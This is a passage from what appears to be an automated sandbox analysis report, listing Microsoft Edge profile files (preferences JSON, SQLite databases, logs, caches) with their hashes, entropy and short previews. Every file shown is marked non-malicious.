                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://edge.microsoft.com","supports_spdy":true},{"isolation":[],"server":"https://substrate.office.com","supports_spdy":true},{"isolation":[],"server":"https://prod.rewardsplatform.microsoft.com","supports_spdy":true},{"isolation":[],"server":"https://edge.activity.windows.com","supports_spdy":true},{"isolation":[],"server":"https://arc.msn.com","supports_spdy":true},{"isolation":[],"server":"https://dns.quad9.net","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375869076793485","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375869076230742","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":118154},"server":"https://assets.msn.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375876272088042",

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\f5828a2e-1476-4674-a6bf-8bc7004878c3.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2491
                                                                                                                                                                                                        Entropy (8bit):5.024582630822769
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:YPj1m4Vr8KVNkGkXX6VVks0LtpsA1zd9crbJ/anUJaYPI7xaMGH1oB+Cm0sY6:KwoGX6VVOZpsAxdOrMn3YPo0MG6+Zc6
                                                                                                                                                                                                        MD5:B88693A29632D7D9F60A1D83D654034B
                                                                                                                                                                                                        SHA1:75CB7F2DADF55C38CA95C9C2E960021CB8CBD64C
                                                                                                                                                                                                        SHA-256:3155F4952684317A20C528640599FDDCB214B509B41CFBD7B84B4D6AD2227553
                                                                                                                                                                                                        SHA-512:2664739792728509C61A2ECC86E40F078CC8E1BAC8CFA7B12AE3A195D9FF82638C8B860187721A8FA4D89DB7D633D68938829D76213BBE87E3BA70562C39E7FD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"edge":{"services":{"last_account_id":"","last_username":""}},"extensions":{"settings":{}},"prefs":{"preference_reset_time":"13375782671147057"},"protection":{"macs":{"browser":{"show_home_button":"904452986128BBEE5A7B1FFB8F342100C3150E3D9FD76C4105DF33EB021E22FD"},"default_search_provider_data":{"template_url_data":"575D258E47F940C6887685ABA99A5839CBFE4BA30863349DFE0D0C375AAB8816"},"edge":{"services":{"account_id":"D456A886A0DBE318CF511789EB70CFBEB8B3E35DA05B44245AFA153CF2527082","identity":{"schema":"50E673A6E3700B5431DD5887049F3271B5C2BEA02D53D968CBD61D36F54D9292"},"last_account_id":"6A5B5A031791B5A5FA7238C8E3FDD8A324CC8F19F63EAD5B2E896B84A5786B51","last_username":"AEEC085E5852B256515B8A4CA04B9576AB6B11591758E5AF201224060FD694E8"}},"homepage":"B1E9FE8108A84F532486D13AAC43C0AFDA16D3DFC9EB2F743AEE11F89F2F163E","homepage_is_newtabpage":"3680F776D17E3C099431BAF5381FAB9BCC0C2C70FEA4C74D12324BC94A207119","media":{"cdm":{"origin_data":"CE16C9485175ED827C5B13C2EE9BFCEDDD3444AF290CF59B851C1B

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, writer version 2, read version 2, file counter 8, database pages 11, cookie 0x7, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):45056
                                                                                                                                                                                                        Entropy (8bit):0.6102577073462683
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TtUYVAKAFXX+mHUETG+s6ksUCaqP+sLKpcEc:4Nsm00ZsTWWseqb
                                                                                                                                                                                                        MD5:9D10BBB0EC93648A80853D82EE42B517
                                                                                                                                                                                                        SHA1:0A8708E35C25D608544FC145FD5F8A5EBCDFC291
                                                                                                                                                                                                        SHA-256:C6D4EA9EB7F5C3DE3ED536FE4E077087A014EFF1D1BD3166D205CC1EEFE0930A
                                                                                                                                                                                                        SHA-512:799F616479971E3D08275BEB770043C429D75FD2F72AD9E651316A85786F23129B17EFB525282DCB89EEDC5E012CBA982E4F3623BF2BA7CA886899B4F4849491
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}.................?.P................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                        Entropy (8bit):0.039491791493707754
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Gtl5/8rb3DpgAwzllI3l5/8rb3DpgAwzlzlXURa9//DllFlnl/telfl6ll:GtorhgAwzo3orhgAwzzk89XDl/c
                                                                                                                                                                                                        MD5:086F42B3190B01E6E1011718B7148438
                                                                                                                                                                                                        SHA1:31C2295F095B3CE0B94ABE295EB92ECC22199760
                                                                                                                                                                                                        SHA-256:BCE97C5D02820E5F79E2C18F8AFB1619B500C68D5AB100CAA2890239DD370B4E
                                                                                                                                                                                                        SHA-512:C1B1A3BBB24BFB76859B4CB3E45A36B3147D2F4D82161CD0297B2B356554A9F771515AF233D395C3F554FF19A7E1BB6BAF925887314F2E0A06750464845C4006
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:..-.......................l.s....._...`q].......-.......................l.s....._...`q].............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16512
                                                                                                                                                                                                        Entropy (8bit):0.6242433251251129
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:KgTg+WUtiT/e+s6kxttIWUCh2qd1+sLt9IA:UHUETG+s6kRhUCUqP+sLAA
                                                                                                                                                                                                        MD5:D43E4BFB4810A6885CEA217FDC972CB9
                                                                                                                                                                                                        SHA1:1D55964AC2E00CEF1873D2BC123F9FC1038D392A
                                                                                                                                                                                                        SHA-256:CEF8BEE4B4F06E8D25103B3C41F369C218ECB45E383B1FFBCCEA32FA81B8ADB4
                                                                                                                                                                                                        SHA-512:4D2A5D7E2A7E9B18C77ABB9BED2B2573BF2BACA415D2EE6A27E1BFA682432F921F548332C16E612C2E75CF999A096DB2584C4D08B78136960067C6401F024EB9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:7....-............_...`4~.M............._...`@./y./............c....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):232
                                                                                                                                                                                                        Entropy (8bit):5.153807895366708
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:VVXntjQPEnjQ63W/G6lhs6lXkkf5WPtKOCG+UI5WPtKOCD+MZ4NyN1FMZ4N1Fk:/XntM+t2GUT4K7t4KU3NSF3N1e
                                                                                                                                                                                                        MD5:DF9F17362577EF2F95E6414A506E4079
                                                                                                                                                                                                        SHA1:74AAD77B3E2615D510951DED18615B24A111513E
                                                                                                                                                                                                        SHA-256:FE781BAFB4F4AAC4245C39694ABA698AB4A659C1F8446F1C93CD518A0B5F9945
                                                                                                                                                                                                        SHA-512:86B9311EA1F25F79E71159356F9E4BCD81DF53CDE59CFB7AAEA7AB4B6CE7E13BAA1127AD5DBFDA8A71FE943A275486F95B8AD6F6AAA81D4C9BE81AB5A442AE35
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:A..r.................20_1_1...1.,U.................20_1_1...1.CO..................4_IPH_LiveCaption...IPH_LiveCaption.....4_IPH_PasswordsAccountStorage!..IPH_PasswordsAccountStorage.....4_IPH_ProfileSwitch...IPH_ProfileSwitch...

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):321
                                                                                                                                                                                                        Entropy (8bit):5.139169966320947
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fNj+q2PCN23oH+TcwtfrK+IFUt8YUz1fNtKJZmw+YUz1fNtK9VkwOCN23oHK:+1fN6v1Yeb23FUt8Z1fNt0/+Z1fNt05a
                                                                                                                                                                                                        MD5:E483001952222441CCE0E3685B86E922
                                                                                                                                                                                                        SHA1:4BDBF92989B53A60FB9A46618C0EC09F7A9761BA
                                                                                                                                                                                                        SHA-256:C46F6048CF150B4D21C403A8C9C5F4D892CA270DAE89D38B45505C13D39A8DA2
                                                                                                                                                                                                        SHA-512:A0E455164FE6979DC62DA7B7439FAD3CF6279503B73EA2D0871BE16DBAF5DC58452F6D160D423629BCCBD7DB5EBF0015FEB58E312B10A6AC4DE3ADF34C6A3F28
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.432 be8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/11-02:11:11.433 be8 Recovering log #3.2024/11/11-02:11:11.433 be8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):321
                                                                                                                                                                                                        Entropy (8bit):5.139169966320947
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fNj+q2PCN23oH+TcwtfrK+IFUt8YUz1fNtKJZmw+YUz1fNtK9VkwOCN23oHK:+1fN6v1Yeb23FUt8Z1fNt0/+Z1fNt05a
                                                                                                                                                                                                        MD5:E483001952222441CCE0E3685B86E922
                                                                                                                                                                                                        SHA1:4BDBF92989B53A60FB9A46618C0EC09F7A9761BA
                                                                                                                                                                                                        SHA-256:C46F6048CF150B4D21C403A8C9C5F4D892CA270DAE89D38B45505C13D39A8DA2
                                                                                                                                                                                                        SHA-512:A0E455164FE6979DC62DA7B7439FAD3CF6279503B73EA2D0871BE16DBAF5DC58452F6D160D423629BCCBD7DB5EBF0015FEB58E312B10A6AC4DE3ADF34C6A3F28
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.432 be8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/11-02:11:11.433 be8 Recovering log #3.2024/11/11-02:11:11.433 be8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):594
                                                                                                                                                                                                        Entropy (8bit):4.003498289542068
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:G0Xtqcsqcva3mF2lHSenmF2lH+l1m8Bc3mtD4tmF2llemF2lq3m8qPmt761m9yKm:G0nYvaZyGVC43oqn624Mtxjx47vgctuW
                                                                                                                                                                                                        MD5:C984C36B7A8692B89E0EBA6BB7FB6AFC
                                                                                                                                                                                                        SHA1:DA58C8A60C0AB35A46A90F48FE0A8DAE90D277EA
                                                                                                                                                                                                        SHA-256:BB097F86663A9DE05CD5B970F9CED4CE0AC4D2ABB590A61B396B7C36EDBF498E
                                                                                                                                                                                                        SHA-512:5B83B55EE087AD3F65A328BE536BB6D314545CF4125806305D9759319693617BB453A65B6FB9D7E71270615FC92D492DC7D8933D9591C374B327246660DACBC6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.h.6.................__global... .t...................__global... ....Q.................20_.........................20_......w...................19_.....u....................18_.........................20_...../...................20_......@C1.................19_......8lS.................18_........h.................21_.....<..[.................9_......~z..................21_.....r....................9_.....m...................__global... ....[.................__global... .t..).................3_.....B....................4_.....:.=..................3_......W2..................4_.....

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):339
                                                                                                                                                                                                        Entropy (8bit):5.13046588315518
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fN7+q2PCN23oH+TcwtfrzAdIFUt8YUz1fN5Zmw+YUz1fNtVkwOCN23oH+Tc/:+1fNiv1Yeb9FUt8Z1fN5/+Z1fNT5eYe+
                                                                                                                                                                                                        MD5:213F2DA56735336420249525BC4D4106
                                                                                                                                                                                                        SHA1:9495881A06FBF9AD74F6E552D51F8C89FE07BD46
                                                                                                                                                                                                        SHA-256:3CA433A08483A95AA41F6D9ED6B2540D4F4A42043111A56AD18F26778F925233
                                                                                                                                                                                                        SHA-512:923AD7D809A9B5047B6165FF5EBA405252E1B82A083D1E9613A9706DC9808BA22AE1CA5A576FCF0D73D00B5779E0D62B73435F92DD833709AA1BA1C21F6812D7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.429 be8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/11-02:11:11.430 be8 Recovering log #3.2024/11/11-02:11:11.430 be8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):339
                                                                                                                                                                                                        Entropy (8bit):5.13046588315518
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fN7+q2PCN23oH+TcwtfrzAdIFUt8YUz1fN5Zmw+YUz1fNtVkwOCN23oH+Tc/:+1fNiv1Yeb9FUt8Z1fN5/+Z1fNT5eYe+
                                                                                                                                                                                                        MD5:213F2DA56735336420249525BC4D4106
                                                                                                                                                                                                        SHA1:9495881A06FBF9AD74F6E552D51F8C89FE07BD46
                                                                                                                                                                                                        SHA-256:3CA433A08483A95AA41F6D9ED6B2540D4F4A42043111A56AD18F26778F925233
                                                                                                                                                                                                        SHA-512:923AD7D809A9B5047B6165FF5EBA405252E1B82A083D1E9613A9706DC9808BA22AE1CA5A576FCF0D73D00B5779E0D62B73435F92DD833709AA1BA1C21F6812D7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.429 be8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/11-02:11:11.430 be8 Recovering log #3.2024/11/11-02:11:11.430 be8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):45056
                                                                                                                                                                                                        Entropy (8bit):0.2975361124918859
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:dRdu/EiHyI+Ra82/CLFdR2vGD/SJ0Yvae5WkE8txuEyGkGTm4rkCdpWEEVVo0g8v:wx9F1IohSdesk9xXytGACtQVjmBa
                                                                                                                                                                                                        MD5:22546422BF75A4EE30E03B69D90E9DF5
                                                                                                                                                                                                        SHA1:665BF967C4CE9BC26542AFAEE4CD9438E07DE9A8
                                                                                                                                                                                                        SHA-256:F3890059F6CE7F39CB1845DD919079680959F9FBBC72060DE39C2AC7B23C0434
                                                                                                                                                                                                        SHA-512:F99679D0C48F4C79D01FAD662B8F9763214A8E4F523FBEC04F5889F948B2A5493812E17D8838DCE3059B0E578AABE918EFE65FADA1E336A274E2CFD3A21F93D2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:............$...).......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                        Entropy (8bit):0.4859886077304933
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:VZvIS9IS5e0ISSUFISSIIS6ISpyISpwIS8RISeISpISmW+ISOoIS8ZIS8lIS5Ela:VZizD4hmTdnVy
                                                                                                                                                                                                        MD5:6C25E867B515517774BB0C09FB455BD4
                                                                                                                                                                                                        SHA1:47C486FC6B2921AA8E87BFE4AC0DBB28BBF4A2D9
                                                                                                                                                                                                        SHA-256:69993F0996A6FCEFC1606AFD0DDBD3EE806FA46D9A862840D5747DC3F56FAF82
                                                                                                                                                                                                        SHA-512:07A51C9632C00C58A1D2002DA6896DB6C09A3FEFBCBE732BCEDF09964699075B5627D2DB053D27406FDBDE027E47DC8DE4C8E8B277FC04EEDD520312329A9B3E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:................*...................................................................w......7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):120
                                                                                                                                                                                                        Entropy (8bit):3.32524464792714
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                        MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                        SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                        SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                        SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11
                                                                                                                                                                                                        Entropy (8bit):2.59490661824394
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:gem3:gL3
                                                                                                                                                                                                        MD5:E60DFE28E77A79CD2CAA4F53BD711995
                                                                                                                                                                                                        SHA1:2A150938498D9778DAF21F87B3E52ABDD4084716
                                                                                                                                                                                                        SHA-256:D5E1FB030857E079A8FD6811C81BF756D23CED9AF5DC299354C88F89B763415E
                                                                                                                                                                                                        SHA-512:B2ED5D4C3EEB946C2C869988E227ACD771614D559E1C108578546AA919E74251B92C7A1241D5E113018AB20A4295BBBCC12B7C520FB1C13DB242EC1B02B74F43
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:94.0.992.31

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14969
                                                                                                                                                                                                        Entropy (8bit):5.625902218243038
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:U9iIuERzA83h09RZxeIKrb8y9eIKf+qNrB:/IuERzA83h09RZxub8y9eIKfHNd
                                                                                                                                                                                                        MD5:7B169E6533A1190C9D60A7D6DC985A4F
                                                                                                                                                                                                        SHA1:FCC541D7DF586A46A6D31E6E08021E58E2A8A710
                                                                                                                                                                                                        SHA-256:C65C4D3896A140BC82CDB49A2E3FB1EBECF2373C53D20F82AD195A52E4C5309E
                                                                                                                                                                                                        SHA-512:33BC784CE3FD81A545F6D5FD4AC2E1388ADE4FFEBD4955086F95026D248D0AEECE7E95A4942D50FF4EC85281B7517B56EC5D3CE8A853F2A5E13EAD94F14727F4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RFdc4c4d.TMP (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14969
                                                                                                                                                                                                        Entropy (8bit):5.625902218243038
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:U9iIuERzA83h09RZxeIKrb8y9eIKf+qNrB:/IuERzA83h09RZxub8y9eIKfHNd
                                                                                                                                                                                                        MD5:7B169E6533A1190C9D60A7D6DC985A4F
                                                                                                                                                                                                        SHA1:FCC541D7DF586A46A6D31E6E08021E58E2A8A710
                                                                                                                                                                                                        SHA-256:C65C4D3896A140BC82CDB49A2E3FB1EBECF2373C53D20F82AD195A52E4C5309E
                                                                                                                                                                                                        SHA-512:33BC784CE3FD81A545F6D5FD4AC2E1388ADE4FFEBD4955086F95026D248D0AEECE7E95A4942D50FF4EC85281B7517B56EC5D3CE8A853F2A5E13EAD94F14727F4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RFdc4c5c.TMP (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14969
                                                                                                                                                                                                        Entropy (8bit):5.625902218243038
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:U9iIuERzA83h09RZxeIKrb8y9eIKf+qNrB:/IuERzA83h09RZxub8y9eIKfHNd
                                                                                                                                                                                                        MD5:7B169E6533A1190C9D60A7D6DC985A4F
                                                                                                                                                                                                        SHA1:FCC541D7DF586A46A6D31E6E08021E58E2A8A710
                                                                                                                                                                                                        SHA-256:C65C4D3896A140BC82CDB49A2E3FB1EBECF2373C53D20F82AD195A52E4C5309E
                                                                                                                                                                                                        SHA-512:33BC784CE3FD81A545F6D5FD4AC2E1388ADE4FFEBD4955086F95026D248D0AEECE7E95A4942D50FF4EC85281B7517B56EC5D3CE8A853F2A5E13EAD94F14727F4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RFdc4caa.TMP (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
